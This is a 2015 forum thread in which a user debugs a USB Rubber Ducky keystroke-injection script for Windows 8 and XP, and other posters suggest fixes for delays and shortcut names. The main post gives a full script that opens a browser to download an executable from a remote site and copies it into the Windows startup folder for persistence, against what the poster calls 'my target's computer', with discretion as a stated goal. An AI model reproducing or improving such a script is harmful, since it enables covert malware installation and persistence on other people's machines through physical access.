BlueMint
Posted October 22, 2015 (edited)

Hi! I received my Ducky yesterday and I tried to make a script, but it didn't work, so I wrote a very simple script to isolate the part that doesn't work. I added a few delays, too, but it didn't solve the problem.

REM Test file
DELAY 2000
GUI r
DELAY 1000
STRING notepad.exe
ENTER

When I try with this one, nothing happens, unless I'm in a webpage or a text editor, and then the following characters appear on my screen: rnotepad.exe

So, I guess that the combo "GUI + r" doesn't work. It's quite bothering; I can't do what I wanted without this shortcut... (I actually want to launch cmd.)

I tried a few things but nothing worked:
- Replacing "GUI r" by "WINDOWS r" or "GUI R"
- Trying different encoders. I've tried the online encoder, the v1.2 command-line encoder, and the encoder with a graphical interface.
- Trying different language settings (I have a French keyboard).
- Pressing the button on the Ducky.

I'm running the script on Windows 8. Do you have any idea why this shortcut doesn't work and what I could do to solve this? Thanks a lot.

Edited October 22, 2015 by BlueMint
phpsystems
Posted October 22, 2015

On Windows 8, you might want to try:

CONTROL ESCAPE

instead of GUI r.
BlueMint (Author)
Posted October 22, 2015 (edited)

> On Windows 8, you might want to try: CONTROL ESCAPE instead of GUI r

Thanks for the help. This shortcut works on Windows 8 (with looong delays), but unfortunately, my real target is a Windows XP. On XP, "CONTROL ESCAPE" only opens the Windows menu, and then, when I type "cmd", the first item beginning with a "c" is launched...

Edited October 22, 2015 by BlueMint
Mr-Protocol
Posted October 22, 2015

Your initial delay needs to be pretty long due to device detection by the OS. Mileage may vary.
BlueMint (Author)
Posted October 23, 2015 (edited)

> Your initial delay needs to be pretty long due to device detection by the OS. Mileage may vary.

I put a "DELAY 5000" at the beginning, and "GUI r" still doesn't work on Win8. But it doesn't matter: as phpsystems said, there is still the "CONTROL ESCAPE" shortcut in this OS.

Now, I'm testing my payload on Windows XP. It failed a few times, but I understood that it was because I was using it on a VM: some random keys fail, sometimes, with VMs. Okay, so I tested it on a real Windows XP and the Ducky's behaviour is pretty unstable. The worst part is that some commands don't work, like "CONTROL x", "CONTROL c", "CONTROL v". I'm trying to replace them with more complex operations (F10 - RIGHT - DOWN - DOWN - DOWN - ENTER, in Windows Explorer, to copy a file), but it's really bothering, because it takes more time, it's not discreet, and it's not really stable either...

So do you have any idea why those commands don't work? Do I have to update the Ducky's firmware or anything?

Edited October 23, 2015 by BlueMint
Mr-Protocol
Posted October 24, 2015

Try CTRL vs CONTROL and see if that makes a difference. Post the source you are compiling?

Start with putting some delays between every command to see if it's working properly, and then trim down the delays from there. For example, if you are trying to do GUI + R, cmd, enter too fast, the computer may not have the run box active before the Ducky starts typing cmd and enter.
BlueMint (Author)
Posted October 25, 2015 (edited)

Thanks for the help. So, this is my script. I replaced "CONTROL" by "CTRL" as you suggested, and I put 1000ms delays around the "control" commands:

DELAY 6000
GUI r
DELAY 1000
STRING chrome -incognito "http://mysite/file.exe"
ENTER
DELAY 3000
CONTROL j
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 100
LEFT
DELAY 100
ENTER
DELAY 500
TAB
DELAY 100
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
CTRL c
DELAY 1000
ALT F4
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING start shell:startup
ENTER
DELAY 1000
CTRL v
DELAY 1000
ENTER
DELAY 1000
DOWN
DELAY 1000
STRING -
DELAY 1000
UP
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
ALT f4
DELAY 1000
ALT f4
DELAY 1000

(The part where I download a file in Chrome is only because PowerShell is not installed on my target's computer, and the "ftp" command gives me errors on Windows XP, so I can't get my file directly with the shell.) I'm not sure either about the "STRING -" (to uncheck a Windows box), but my payload stops working before that point.

I made a video. Look: at 00:17, I've "opened file location" in Chrome, and I send the command CTRL c. The path is suddenly selected, and nothing is copied to the clipboard. I have the same problem with CONTROL c, or with CTRL x.

https://www.youtube.com/watch?v=nbAXdFJ2cLc

Edited October 25, 2015 by BlueMint
Mr-Protocol
Posted October 25, 2015

That is kind of odd. Maybe add a keyboard "b" key press, like you were spelling out the program, to highlight it and try that out? I don't have a Win XP to test on. It may be doing something funky with Chrome "Show In Folder" on XP and selecting the path bar instead of the file itself.